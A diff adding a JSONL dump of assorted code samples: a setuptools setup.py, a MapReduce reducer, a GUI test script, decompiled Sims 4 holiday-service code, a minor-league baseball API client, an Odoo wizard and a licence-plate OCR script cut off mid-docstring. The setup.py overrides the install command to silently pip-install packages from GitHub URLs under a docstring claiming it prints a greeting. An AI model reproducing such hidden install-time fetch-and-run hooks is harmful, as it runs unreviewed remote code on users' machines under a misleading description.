diff --git "a/2376.jsonl" "b/2376.jsonl" new file mode 100644--- /dev/null +++ "b/2376.jsonl" @@ -0,0 +1,629 @@ +{"seq_id":"569044274","text":"from setuptools import setup\nfrom setuptools.command.install import install\nimport sys\nimport subprocess\n\n\nclass PrecommitInstallCommand(install):\n \"\"\"Customized setuptools install command - prints a friendly greeting.\"\"\"\n def run(self):\n subprocess.call('pip install git+https://github.com/PyCQA/astroid git+https://github.com/PyCQA/pylint', shell=True)\n super().run()\n\n\nsetup(\n name='pre_commit_dummy_package',\n version='0.0.0',\n cmdclass={\n 'install': PrecommitInstallCommand,\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"565735500","text":"#!/usr/bin/env python\nimport sys\n\nlink_counts = {}\n\nfor line in sys.stdin:\n link, count = line.strip().split('\\t')\n link_counts[link] = int(count)\n\nresult = {}\nfor k1, v1 in link_counts.items():\n rank = 0\n for k2, v2 in link_counts.items():\n if v1 > v2:\n rank += 1\n result[k1] = rank\n \nfor link, count in sorted(result.items(), reverse=True):\n print('%s\\t%s' % (link, count))\n","sub_path":"PopularityLeagueReducer.py","file_name":"PopularityLeagueReducer.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"116895413","text":"useFixture(RecordEditor)\r\n\r\ndef test():\r\n\tfrom Modules import commonBits\r\n\r\n\tjava_recorded_version = '1.6.0_03'\r\n\r\n\tif window('Record Editor'):\r\n\t\tclick(commonBits.fl('Choose File'))\r\n\r\n\t\tif window('Open'):\r\n\t\t\tselect(commonBits.selectPane(), 'Ams_LocDownload_20041228.txt')\r\n\t\t\tclick('Open')\r\n\t\tclose()\r\n\r\n\t\tcommonBits.setRecordLayout(select, 'ams Store')\r\n\r\n\t\tclick(commonBits.fl('Edit') + '1')\r\n##\t\tselect('Table', 'rows:[0,1,2,3,4,5],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tselect('Table', 'rows:[0,1,2,3,4,5],columns:[8 - 2|Loc Type]')\r\n\t\tselect_menu(commonBits.fl('View') + '>>' + commonBits.fl('Column View #{Selected Records#}'))\r\n##\t\tselect('Table2', 'rows:[0,1,2,3,4,5],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tselect('Table', 'cell:Row 1,0(TAR)')\r\n\t\tassert_p('Table1', 'Text', '3', commonBits.fl('Len') + ',0')\r\n\t\tselect('Table', 'cell:Row 1,1(5839)')\r\n\t\tassert_p('Table', 'Content', '[[TAR, TAR, TAR, TAR, TAR, TAR], [5839, 5850, 5853, 5866, 5015, 5019], [DC, DC, DC, DC, ST, ST], [DC - Taras Ave, VIC West Ad Support, NSW North Sydney Ad Support, WA Ad Support, Bankstown, Penrith], [, , , , Bankstown, Penrith], [30-68 Taras Ave, Lot 2 Little Boundary Rd, , , Unit 2, 39-41 Allingham Street, 58 Leland Street], [Altona North, Laverton, , , Condell Park, Penrith], [3025, 3028, , , 2200, 2750], [VIC, VIC, , , NSW, NSW], [A, A, A, A, A, A]]')\r\n\t\tselect('Table', 'cell:Row 1,1(5839)')\r\n\t\tcommonBits.closeWindow(click)\r\n\t\t##click('BasicInternalFrameTitlePane$NoFocusButton2')\r\n\t\tselect('Table', 'rows:[0,1,2,3,4,5],columns:[4 - 4|Loc Nbr,8 - 2|Loc Type]')\r\n\t\tselect('Table', 'rows:[8,11,15],columns:[4 - 4|Loc Nbr,8 - 2|Loc 
Type]')\r\n\t\tcommonBits.closeWindow(click)\r\n\t\t##click('BasicInternalFrameTitlePane$NoFocusButton2')\r\n\tclose()\r\n","sub_path":"Build/Instalation/GeneralDb/Marathon/MarathonTests_1.1/LargeFile_Edit/TestCases/View/ColumnView1.py","file_name":"ColumnView1.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"186144693","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\holidays\\holiday_service.py\n# Compiled at: 2020-01-28 20:39:21\n# Size of source mod 2**32: 18206 bytes\nfrom _collections import defaultdict\nfrom protocolbuffers import GameplaySaveData_pb2\nfrom date_and_time import DAYS_PER_WEEK, create_time_span, DATE_AND_TIME_ZERO\nfrom distributor.rollback import ProtocolBufferRollback\nfrom distributor.system import Distributor\nfrom drama_scheduler.drama_node_types import DramaNodeType\nfrom event_testing.resolver import DataResolver\nfrom holidays.custom_holiday import CustomHoliday\nfrom holidays.holiday_ops import SendHolidayInfo\nfrom id_generator import generate_object_id\nfrom seasons.seasons_enums import SeasonLength, SeasonType\nfrom seasons.seasons_tuning import SeasonsTuning\nfrom sims4.common import Pack\nfrom sims4.service_manager import Service\nfrom sims4.tuning.tunable import TunablePackSafeReference\nfrom sims4.utils import classproperty\nimport persistence_error_types, services, sims4.log\nlogger = sims4.log.Logger('Holiday', default_owner='jjacobson')\n\nclass YearOfHolidays:\n\n def __init__(self, season_length):\n self._season_length = season_length\n self._holidays = defaultdict(dict)\n\n def holidays_to_schedule_gen(self):\n for season, season_data in self._holidays.items():\n for day, holiday_id in season_data.items():\n yield (\n season, day, holiday_id)\n\n def get_holiday_data(self, holiday_id_for_data):\n for season, day, holiday_id in self.holidays_to_schedule_gen():\n if holiday_id == holiday_id_for_data:\n return (\n season, day)\n\n return (None, None)\n\n def add_holiday(self, season, day, holiday_id):\n season_length = int(SeasonsTuning.SEASON_LENGTH_OPTIONS[self._season_length]().in_days())\n if day > season_length:\n day_in_week = day % DAYS_PER_WEEK\n day = day_in_week + season_length - DAYS_PER_WEEK\n if day in self._holidays[season]:\n return\n self._holidays[season][day] = holiday_id\n\n def remove_holiday(self, holiday_id_to_remove):\n for holidays in tuple(self._holidays.values()):\n for day, holiday_id in tuple(holidays.items()):\n if holiday_id == holiday_id_to_remove:\n del holidays[day]\n return\n\n def save(self, msg):\n msg.season_length = self._season_length\n for season, season_map in self._holidays.items():\n for day, holiday_id in season_map.items():\n with ProtocolBufferRollback(msg.holidays) as (holiday_time_msg):\n holiday_time_msg.holiday_id = holiday_id\n holiday_time_msg.day = day\n holiday_time_msg.season = season\n\n def load(self, msg):\n for holiday_time_data in msg.holidays:\n season = SeasonType(holiday_time_data.season)\n self._holidays[season][holiday_time_data.day] = holiday_time_data.holiday_id\n\n\nclass HolidayService(Service):\n CUSTOM_HOLIDAY_DRAMA_NODE = TunablePackSafeReference(description='\\n The drama node to construct to run a custom holiday.\\n ',\n 
manager=(services.get_instance_manager(sims4.resources.Types.DRAMA_NODE)))\n\n def __init__(self):\n self._holidays = {}\n self._holiday_times = {}\n\n @classproperty\n def required_packs(cls):\n return (\n Pack.EP05,)\n\n @classproperty\n def save_error_code(cls):\n return persistence_error_types.ErrorCodes.SERVICE_SAVE_FAILED_HOLIDAY_SERVICE\n\n def _schedule_holiday(self, holiday_id):\n resolver = DataResolver(None)\n season_service = services.season_service()\n current_season_length = season_service.season_length_option\n drama_scheduler = services.drama_scheduler_service()\n season, day = self._holiday_times[current_season_length].get_holiday_data(holiday_id)\n if season is None:\n logger.error('Trying to schedule holiday of id {} which is not actually scheduled to run at any time.')\n return\n for season_type, season_content in season_service.get_seasons_for_scheduling():\n if season_type != season:\n continue\n holiday_start_time = season_content.start_time + create_time_span(days=day)\n drama_scheduler.schedule_node((HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE), resolver, specific_time=holiday_start_time, holiday_id=holiday_id)\n\n def _schedule_all_holidays(self, holiday_ids_to_ignore=()):\n resolver = DataResolver(None)\n season_service = services.season_service()\n current_season_length = season_service.season_length_option\n drama_scheduler = services.drama_scheduler_service()\n season_data = defaultdict(list)\n for season_type, season_content in season_service.get_seasons_for_scheduling():\n season_data[season_type].append(season_content)\n\n for season, day, holiday_id in self._holiday_times[current_season_length].holidays_to_schedule_gen():\n if holiday_id in holiday_ids_to_ignore:\n continue\n for season_content in season_data[season]:\n holiday_start_time = season_content.start_time + create_time_span(days=day)\n drama_scheduler.schedule_node((HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE), resolver, specific_time=holiday_start_time, holiday_id=holiday_id)\n\n def on_season_content_changed(self):\n drama_scheduler = services.drama_scheduler_service()\n drama_scheduler.cancel_scheduled_nodes_with_types((HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE,))\n for drama_node in tuple(drama_scheduler.get_running_nodes_by_class(HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE)):\n if drama_node.is_running:\n continue\n drama_scheduler.complete_node(drama_node.uid)\n\n self._schedule_all_holidays()\n holidays = {}\n for drama_node in tuple(drama_scheduler.scheduled_nodes_gen()):\n if drama_node.drama_node_type != DramaNodeType.HOLIDAY:\n continue\n day = drama_node.day\n existing_node = holidays.get(day)\n if existing_node is None:\n holidays[day] = drama_node\n continue\n if type(existing_node) is HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE:\n drama_scheduler.cancel_scheduled_node(drama_node.uid)\n else:\n drama_scheduler.cancel_scheduled_node(existing_node.uid)\n holidays[day] = drama_node\n\n def on_all_households_and_sim_infos_loaded(self, client):\n holiday_ids_to_ignore = {drama_node.holiday_id for drama_node in services.drama_scheduler_service().all_nodes_gen() if type(drama_node) is HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE if type(drama_node) is HolidayService.CUSTOM_HOLIDAY_DRAMA_NODE}\n if not self._holiday_times:\n for season_length in SeasonLength:\n self._holiday_times[season_length] = YearOfHolidays(season_length)\n\n for season_type, season_content in services.season_service().get_four_seasons():\n for season_length, holiday, day_of_season in season_content.get_all_holiday_data():\n 
self._holiday_times[season_length].add_holiday(season_type, day_of_season, holiday.guid64)\n\n self._schedule_all_holidays(holiday_ids_to_ignore)\n\n def add_a_holiday(self, holiday_proto, season, day):\n holiday_id = generate_object_id()\n new_holiday = CustomHoliday(holiday_id, None)\n self._holidays[holiday_id] = new_holiday\n new_holiday.load_holiday(holiday_proto)\n for holiday_time in self._holiday_times.values():\n holiday_time.add_holiday(season, day, holiday_id)\n\n self._schedule_holiday(holiday_id)\n\n def remove_a_holiday(self, holiday_id):\n drama_scheduler_service = services.drama_scheduler_service()\n for drama_node in tuple(drama_scheduler_service.scheduled_nodes_gen()):\n if drama_node.drama_node_type != DramaNodeType.HOLIDAY:\n continue\n if drama_node.holiday_id != holiday_id:\n continue\n drama_scheduler_service.cancel_scheduled_node(drama_node.uid)\n\n for drama_node in tuple(drama_scheduler_service.active_nodes_gen()):\n if drama_node.drama_node_type != DramaNodeType.HOLIDAY:\n continue\n if drama_node.holiday_id != holiday_id:\n continue\n drama_scheduler_service.complete_node(drama_node.uid)\n\n for holiday_year_data in self._holiday_times.values():\n holiday_year_data.remove_holiday(holiday_id)\n\n if holiday_id in self._holidays:\n del self._holidays[holiday_id]\n\n def is_valid_holiday_id(self, holiday_id):\n return self._get_holiday_data(holiday_id) is not None\n\n def _get_holiday_data(self, holiday_id):\n holiday_data = self._holidays.get(holiday_id)\n if holiday_data is None:\n holiday_data = services.get_instance_manager(sims4.resources.Types.HOLIDAY_DEFINITION).get(holiday_id)\n return holiday_data\n\n def get_holiday_traditions(self, holiday_id):\n return self._get_holiday_data(holiday_id).traditions\n\n def get_holiday_display_name(self, holiday_id):\n return self._get_holiday_data(holiday_id).display_name\n\n def get_holiday_display_icon(self, holiday_id):\n return self._get_holiday_data(holiday_id).display_icon\n\n def get_holiday_time_off_work(self, holiday_id):\n return self._get_holiday_data(holiday_id).time_off_work\n\n def get_holiday_time_off_school(self, holiday_id):\n return self._get_holiday_data(holiday_id).time_off_school\n\n def get_holiday_calendar_alert_notification(self, holiday_id):\n return self._get_holiday_data(holiday_id).calendar_alert_description\n\n def get_decoration_preset(self, holiday_id):\n return self._get_holiday_data(holiday_id).decoration_preset\n\n def get_holiday_audio_sting(self, holiday_id):\n return self._get_holiday_data(holiday_id).audio_sting\n\n def can_holiday_be_modified(self, holiday_id):\n return self._get_holiday_data(holiday_id).can_be_modified\n\n def send_holiday_info_message(self, holiday_id):\n holiday_data = self._get_holiday_data(holiday_id)\n send_holiday_info = SendHolidayInfo(holiday_id, holiday_data.display_name, holiday_data.display_icon, holiday_data.time_off_work, holiday_data.time_off_school, holiday_data.traditions, holiday_data.can_be_modified, holiday_data.decoration_preset)\n distributor = Distributor.instance()\n distributor.add_op_with_no_owner(send_holiday_info)\n\n def save(self, save_slot_data=None, **kwargs):\n holiday_service_proto = GameplaySaveData_pb2.PersistableHolidayService()\n for custom_holiday in self._holidays.values():\n with ProtocolBufferRollback(holiday_service_proto.holidays) as (holiday_data):\n custom_holiday.save_holiday(holiday_data)\n\n for calendar in self._holiday_times.values():\n with ProtocolBufferRollback(holiday_service_proto.calendars) as 
(calendar_msg):\n                calendar.save(calendar_msg)\n\n        save_slot_data.gameplay_data.holiday_service = holiday_service_proto\n\n    def load(self, zone_data=None):\n        save_slot_data = services.get_persistence_service().get_save_slot_proto_buff()\n        msg = save_slot_data.gameplay_data.holiday_service\n        holiday_manager = services.get_instance_manager(sims4.resources.Types.HOLIDAY_DEFINITION)\n        for custom_holiday_msg in msg.holidays:\n            holiday_type = holiday_manager.get(custom_holiday_msg.holiday_type)\n            custom_holiday = CustomHoliday(custom_holiday_msg.holiday_type, holiday_type)\n            custom_holiday.load_holiday(custom_holiday_msg)\n            self._holidays[custom_holiday.holiday_id] = custom_holiday\n\n        for holiday_calendar in msg.calendars:\n            calendar_length = SeasonLength(holiday_calendar.season_length)\n            self._holiday_times[calendar_length] = YearOfHolidays(calendar_length)\n            self._holiday_times[calendar_length].load(holiday_calendar)\n\n    def modify_holiday(self, holiday_proto):\n        holiday_id = holiday_proto.holiday_type\n        current_traditions = set(self.get_holiday_traditions(holiday_id))\n        previous_preset = self.get_decoration_preset(holiday_id)\n        if holiday_id not in self._holidays:\n            holiday_manager = services.get_instance_manager(sims4.resources.Types.HOLIDAY_DEFINITION)\n            holiday_type = holiday_manager.get(holiday_id)\n            self._holidays[holiday_id] = CustomHoliday(holiday_id, holiday_type)\n        self._holidays[holiday_id].load_holiday(holiday_proto)\n        ordered_traditions = self.get_holiday_traditions(holiday_id)\n        new_traditions = set(ordered_traditions)\n        added_traditions = new_traditions.difference(current_traditions)\n        removed_traditions = current_traditions.difference(new_traditions)\n        active_household = services.active_household()\n        if active_household is None:\n            return\n        active_household.holiday_tracker.on_holiday_modified(holiday_id, added_traditions, removed_traditions, ordered_traditions, previous_preset is not self.get_decoration_preset(holiday_id))","sub_path":"Scripts/simulation/holidays/holiday_service.py","file_name":"holiday_service.py","file_ext":"py","file_size_in_byte":13607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"414365663","text":"from urllib2 import urlopen\nfrom urllib import quote\nfrom datetime import datetime\nfrom json import loads\nfrom ysportsapi import ysportsapi\n\nclass milbapi:\n    def __init__(self):\n        self.url_base = \"http://www.milb.com/lookup/json/named.\"\n\n    def request(self, playerID=None, playerName=None, teamID=None, \n            system=None, staff=None, stats=None, stats_type=None, last10=None,\n            schedule=None, season=None):\n        req_url = self.url_base\n\n        if season is None:\n            season=str(datetime.today().year)\n\n        if playerName is not None:\n            req_url += \"milb_player_search.bam?name_part=\" + \\\n                quote(\"\\'%s\\'\" % playerName)\n        elif playerID is not None:\n            if stats is None:\n                req_url += \"player.bam?player_id=\" + playerID\n            elif stats_type is None:\n                req_url += \"player_has_stats_year.bam?player_id=\" + playerID + \\\n                    \"&league_list_id=%27mlb_milb%27\"\n            else:\n                if stats_type=='H':\n                    req_url += \"sport_hitting_composed.bam?game_type=%27R%27&\" + \\\n                    \"league_list_id=%27mlb_milb%27&player_id=\" + \\\n                    playerID + \"&sport_hitting_composed.season=\" + season\n                else:\n                    req_url += \"player_has_stats_year.bam?player_id=\" \\\n                        + playerID + \"&league_list_id=%27mlb_milb%27\"\n        elif last10 is not None:\n            #FAR FROM COMPLETE\n            req_url += \"player_has_stats_year.bam?player_id=\" + 
playerID + \\\n \"&league_list_id=%27mlb_milb%27\"\n elif teamID is not None:\n if staff is not None:\n req_url += \"roster_active_staff.bam?team_id=\" + teamID\n elif schedule is not None:\n req_url += \"schedule_team_complete.bam?season=\" + season + \\\n \"&team_id=\" + teamID #+ \"&start_date=%27\" + season + \\\n #\"%2F01%2F01%27&end_date=%27\" + season + \"%2F12%2F31%27\"\n else:\n req_url += \"roster_all.bam?team_id=\" + teamID\n elif system is not None:\n req_url += \"milb_standings_display_flip.bam?season=\" + season\n\n ret_json = loads(urlopen(req_url).read())\n \n return ret_json\n\n def get_profile(self, playerID):\n prof = self.request(playerID=playerID)['player']['queryResults']['row']\n\n if prof['pro_debut_date'] != \"\":\n debut = datetime.strptime(prof['pro_debut_date'][0:10], \"%Y-%m-%d\")\n else:\n debut = None\n\n ret_profile = {\n \"name\" : prof['name_first_last'],\n \"name_middle\" : prof['name_middle'],\n \"name_matrilineal\" : prof['name_matrilineal'],\n \"pos\" : prof['primary_position_txt'],\n \"born\" : datetime.strptime(prof['birth_date'][0:10], \"%Y-%m-%d\"),\n \"birthplace\" : prof['birth_city'] + ', ' + prof['birth_country'],\n \"birth_st\" : prof['birth_state'],\n \"bats\" : prof['bats'],\n \"throws\" : prof['throws'],\n \"height\" : prof['height_feet'] + '-' + prof['height_inches'], \n \"weight\" : prof['weight'],\n \"drafted\" : prof['draft_year'] + ' ' + prof['draft_round'] + \\\n ' ' + prof['draft_team_abbrev'],\n \"college\" : prof['college'],\n \"nickname\" : prof['name_nick'],\n \"twitter\" : prof['twitter_id'],\n \"highschool\" : prof['high_school'],\n \"pro_debut\" : debut}\n\n return ret_profile\n\n def match_yahoo_player(self, yahooID):\n y = ysportsapi().get_profile(yahooID)\n\n results = self.request(playerName=y['name'])\\\n ['milb_player_search']['queryResults']['row']\n\n if isinstance(results, list):\n for i in results:\n if y['born'] == \\\n datetime.strptime(i['player_birth_date'][0:10], \"%Y-%m-%d\"):\n p_id = i['player_id']\n else:\n p_id = results['player_id']\n\n return p_id\n\n def get_system(self, org=None):\n raw_sys_data = self.request(system=True)['milb_standings_display_flip']\n raw_system = raw_sys_data['org_history']['queryResults']['row']\n\n ret_system=[]\n for i in raw_system:\n ret_system.append({'name' : i['name_full'],\n 'id' : i['organization_id'],\n 'abbrev' : i['name_abbrev'],\n 'org_code' : i['org_code'],\n 'parent_org' : i['parent_org'],\n 'type' : i['org_type']})\n\n if org is not None:\n ret_org = get_child_orgs(ret_system, org)\n return ret_org\n\n else:\n return ret_system\n\n def get_teams(self):\n raw_sys_data = self.request(system=True)['milb_standings_display_flip']\n raw_teams = raw_sys_data['team_all_season']['queryResults']['row']\n\n ret_teams=[]\n for i in raw_teams:\n if 'mlb_org_id' in i and i['mlb_org_id'] != '':\n #if i['sport_code'] == 'mlb' and i['city'] != '': #and \\\n #i['all_star_sw'] == 'N' or i['mlb_org_id'] != '':\n ret_teams.append({'code' : i['sport_code'],\n 'id' : i['team_id'],\n 'abbrev' : i['name_abbrev'],\n 'city' : i['city'],\n 'name' : i['name'],\n 'full_name' : i['name_display_long'],\n 'league_id' : i['league_id'],\n 'state' : i['state'],\n 'venue_id' : i['venue_id'],\n 'venue_name' : i['venue_name'],\n 'org' : i['mlb_org'],\n 'org_id' : i['mlb_org_id']})\n\n return ret_teams\n\n def get_roster(self, teamID, status='Full'):\n raw_roster = self.request(teamID=teamID)\n roster = raw_roster['roster_all']['queryResults']['row']\n \n ret_roster = []\n for i in roster:\n ros_spot = 
{\n \"player_id\" : i['player_id'],\n \"first_name\" : i['name_first'],\n \"last_name\" : i['name_last'],\n \"disp_name\" : i['name_display_first_last'],\n \"pos\" : i['position'],\n \"num\" : i['jersey_number'],\n \"bats\" : i['bats'],\n \"throws\" : i['throws'],\n \"status\" : i['status_short'],\n \n \"born\" : datetime.strptime(i['birth_date'][0:10], \\\n \"%Y-%m-%d\"),\n \"debut\" : datetime.strptime(i['start_date'][0:10], \"%Y-%m-%d\")}\n\n if status == 'Active':\n if i['status_code'] == 'A':\n ret_roster.append(ros_spot)\n elif status == 'DL':\n if i['status_code'][0] == 'D':\n ret_roster.append(ros_spot)\n elif status == 'Position':\n if i['status_code'] == 'A' and i['primary_position'] != '1':\n ret_roster.append(ros_spot)\n elif status == 'Pitching':\n if i['status_code'] == 'A' and i['primary_position'] == '1':\n ret_roster.append(ros_spot)\n else:\n ret_roster.append(ros_spot)\n \n return ret_roster\n\n def get_staff(self, teamID):\n raw_staff = self.request(teamID=teamID, staff=True)\n staff = raw_staff['roster_active_staff']['queryResults']['row']\n\n ret_staff = []\n for i in staff:\n staffer = {\n \"player_id\" : i['player_id'],\n \"first_name\" : i['name_first'],\n \"last_name\" : i['name_last'],\n \"job\" : i['job'],\n \"num\" : i['jersey_number'],\n \"bats\" : i['bats'],\n \"throws\" : i['throws'],\n \"debut\" : datetime.strptime(i['start_date'][0:10], \"%Y-%m-%d\")}\n\n ret_staff.append(staffer)\n\n return ret_staff\n\n def get_schedule(self, teamID, season=None):\n if season is None:\n raw_schedule = self.request(teamID=teamID, schedule=True)\n else:\n raw_schedule = self.request(teamID=teamID, schedule=True, \\\n season=season)\n schedule = raw_schedule['schedule_team_complete']['queryResults']['row']\n\n ret_schedule = []\n for i in schedule:\n game = {\n \"team_id\" : i['team_id'],\n \"team_lg\" : i['league_id'],\n \"team_tz\" : i['team_time_zone'],\n \"opp_id\" : i['opponent_id'],\n \"opp_lg\" : i['opponent_league_id'],\n \"opp_tz\" : i['opponent_time_zone'],\n \"venue\" : i['venue_name'],\n \"loc\" : i['venue_city'] + ', ' + i['venue_twc_loc'][2:4],\n \"loc_tz\" : i['time_zone_local'],\n \"home_away\" : i['home_away_sw'],\n \"double_header\" : i['double_header_sw'],\n \"game_num\" : i['game_nbr'],\n \"gametime\" : datetime.strptime(i['game_time_et'],\n '%Y-%m-%dT%H:%M:%S')}\n\n ret_schedule.append(game)\n\n return ret_schedule\n\n def get_child_orgs(system, top_org):\n ret_orgs = []\n for i in system:\n if i['id'] == top_org:\n ret_orgs.append(i)\n elif 'parent_org' in i and i['parent_org'] == top_org:\n ret_orgs.append(get_child_orgs(system, i['id']))\n return ret_orgs\n","sub_path":"plod_api/milbapi.py","file_name":"milbapi.py","file_ext":"py","file_size_in_byte":9456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"374026874","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# For copyright and license notices, see __openerp__.py file in module root\n# directory\n##############################################################################\nimport datetime\nimport calendar\nimport base64\nimport re\nfrom dateutil.relativedelta import relativedelta\nfrom odoo import api, fields, models\n\n\nclass account_cxc_chq_wizard(models.TransientModel):\n _name = 'account.cxc.chq.wizard'\n _description = 'Summary of composition of sales balances'\n\n date = fields.Date(\n 'Date', default=fields.Date.context_today)\n\n company_id = fields.Many2one(\n 
'res.company',\n 'Company',\n default=lambda self: self.env.user.company_id,\n )\n customer_id = fields.Many2one(\n 'res.partner',\n string='Partner',\n domain=[('customer', '=', True)]\n )\n supplier_id = fields.Many2one(\n 'res.partner',\n string='Partner',\n domain=[('supplier', '=', True)]\n )\n days_check_endorsed = fields.Integer(\n 'Days of old endorsed checks', default=30\n )\n days_check_deposited = fields.Integer(\n 'Days of old deposited checks', default=5\n )\n type = fields.Selection([\n ('sale','Sale'),\n ('purchase','Purchase')],\n string=\"Type\")\n\n def print_report(self):\n data = {'ids': self.env.context.get('active_ids', [])}\n res = self.read()\n res = res and res[0] or {}\n data.update({'form': res})\n if self.type == 'sale':\n res = self.read(['date', 'company_id', 'days_check_endorsed','days_check_deposited', 'customer_id'])\n res = res and res[0] or {}\n data.update({'form': res})\n return self.env.ref('l10n_ar_report.report_account_cxc_chq').report_action([], data=data)\n # return self.env['report'].get_action(self,'l10n_ar_report.report_account_cxc_check', data=data)\n else:\n res = self.read(['date', 'company_id', 'days_check_endorsed','days_check_deposited', 'supplier_id'])\n res = res and res[0] or {}\n data.update({'form': res})\n return self.env.ref('l10n_ar_report.report_account_cxp_chq').report_action([], data=data)\n # return self.env['report'].get_action(self,'l10n_ar_report.report_account_cxp_check', data=data)\n","sub_path":"l10n_ar_report/wizards/account_cxc_chq_wizard.py","file_name":"account_cxc_chq_wizard.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"403046402","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\nimport pytesseract\r\n#pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe'\r\n\r\ndef LPRmain(fileName = '1', imgShow = True):\r\n img = cv2.imread('spz\\\\'+str(fileName)+'.jpg') #(,cv2.IMREAD_COLOR)\r\n \"\"\"\r\n Definování cesty k obrázku\r\n \"\"\" \r\n\r\n img = cv2.resize(img, (600,400) )\r\n \"\"\"\r\n Změna velikosti a uložení do proměnné img\r\n Změnou velikosti zabráníme problémům s velkým rozlišením fotografií\r\n \"\"\"\r\n\r\n #cv2.imshow('Orig',img)\t#kontrola \r\n \"\"\"\r\n Zobrazení obrázku v okně\r\n \"\"\"\r\n\r\n\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \r\n \"\"\"\r\n Převedení obrázku do odstínů šedé\r\n Obrázek v odstíněch šedé zrychlí další kroky\r\n \"\"\"\r\n\r\n gray = cv2.bilateralFilter(gray, 13, 15, 15) \t\t\r\n \"\"\"\r\n Zbavení se šumu a nedostatků fotky\r\n Můžeme nastavovat 2 poslední parametry od 15 výš - podle toho se rozmaže pozadí\r\n \"\"\"\r\n\r\n #cv2.imshow('Gray',gray)\t#kontrola\r\n\r\n\r\n edged = cv2.Canny(gray, 30, 220) \t\t\t\t\r\n \"\"\"\r\n Vykreslení hran na obrázku\r\n\r\n Args:\r\n (int): minimum a maximum \r\n hrany které mají \"intensity gradient\" mezi těmito\r\n hodnotami se vykreslí\r\n \"\"\"\r\n\r\n if(imgShow): cv2.imshow('hrany',edged)\t#kontrola\r\n\r\n\r\n ##### hledaní spojených hran #####\r\n\r\n contours = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) #cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\n \"\"\"\r\n Najdeme uzavřené obrysy, abychom lépe detekovali všechny obdélníky na obrázku\r\n a z nich vybrali SPZ\r\n \"\"\"\r\n\r\n #print(contours)\t#kontrola listu\r\n\r\n contours = imutils.grab_contours(contours)\r\n \"\"\"\r\n Obrysy uchováme\r\n 
\"\"\"\r\n\r\n contours = sorted(contours, key = cv2.contourArea, reverse = True)[:10]\t\r\n \"\"\"\r\n Uspořádáme od největšího a uchováme prvních 10 prvků\r\n \"\"\"\r\n\r\n #print(contours)\t#kontrola listu\r\n\r\n screenCnt = None\r\n\r\n for c in contours:\r\n \"\"\"\r\n Projdeme všechny obrysy a najdeme takový, který má tvar obdélníku,\r\n čtyři strany a je uzavřený.\r\n \"\"\"\r\n peri = cv2.arcLength(c, True)\t\t\t\r\n approx = cv2.approxPolyDP(c, 0.018 * peri, True)\r\n \r\n if len(approx) == 4:\t #Pokud má přibližný obrys 4 body předpokládáme, že jsme našli SPZ a uložíme do screenCnt\r\n screenCnt = approx\r\n break\r\n\r\n if screenCnt is None:\t\t #Pokud není nalezen obrys se 4 body\r\n detected = 0\r\n print (\"No contour detected\")\r\n else:\r\n detected = 1\r\n\r\n if detected == 1:\t\t\t #Vykreslíme okolo nalezeného obrysu obdelník, pro ujištění se že je to SPZ \r\n cv2.drawContours(img, [screenCnt], -1, (0, 0, 255), 3)\r\n \"\"\"\r\n Okolo nalezeného obdélníku vykreslíme červený tvar\r\n \"\"\"\r\n\r\n ##### Vytvoření masky okolo nalezené SPZ #####\r\n maska = np.zeros(gray.shape,np.uint8)\t\r\n new_image = cv2.drawContours(maska,[screenCnt],0,255,-1,)\r\n new_image = cv2.bitwise_and(img,img,mask=maska)\r\n \"\"\"\r\n Vytvoříme masku okolo nalezené SPZ a zbytek obrázku odstraníme\r\n \"\"\"\r\n\r\n #cv2.imshow('maska',new_image)\t#kontrola\r\n\r\n ##### Oriznuti obrazku, kde je maska #####\r\n (x, y) = np.where(maska == 255)\t\r\n (topx, topy) = (np.min(x), np.min(y))\r\n (bottomx, bottomy) = (np.max(x), np.max(y))\r\n Cropped = gray[topx:bottomx+1, topy:bottomy+1]\r\n \"\"\"\r\n Ořízneme obrázek, pomocí masky\r\n \"\"\"\r\n\r\n #cv2.imshow('oriznute',Cropped)\t#kontrola\r\n\r\n\r\n ##### Cteni textu z vysledneho obrazku #####\r\n\r\n #print(pytesseract.get_languages(config=''))\t #kontrola dostupnych nastaveni teseracu (lang=...)\r\n\r\n text = pytesseract.image_to_string(Cropped, lang='eng', config='--psm 10 -c tessedit_char_whitelist=ABCDEFHIJKLMNPRSTUVXYZ0123456789') #config --psm10 je single character recognition (moznosti nastaveni --psm lze najit napsanim do konzole \"tesseract --help-psm\") mozno dodat --oem 1 (Neural Nets) \r\n \"\"\"\r\n Použijeme tesseract na přečtení textu z obrázku\r\n\r\n Args:\r\n lang (str): jazyk\r\n config (str): --psm10 je single character recognization\r\n -c tessedit_char_whitelist je whitelist znaků, které může obsahovat\r\n hrany které mají \"intensity gradient\" mezi 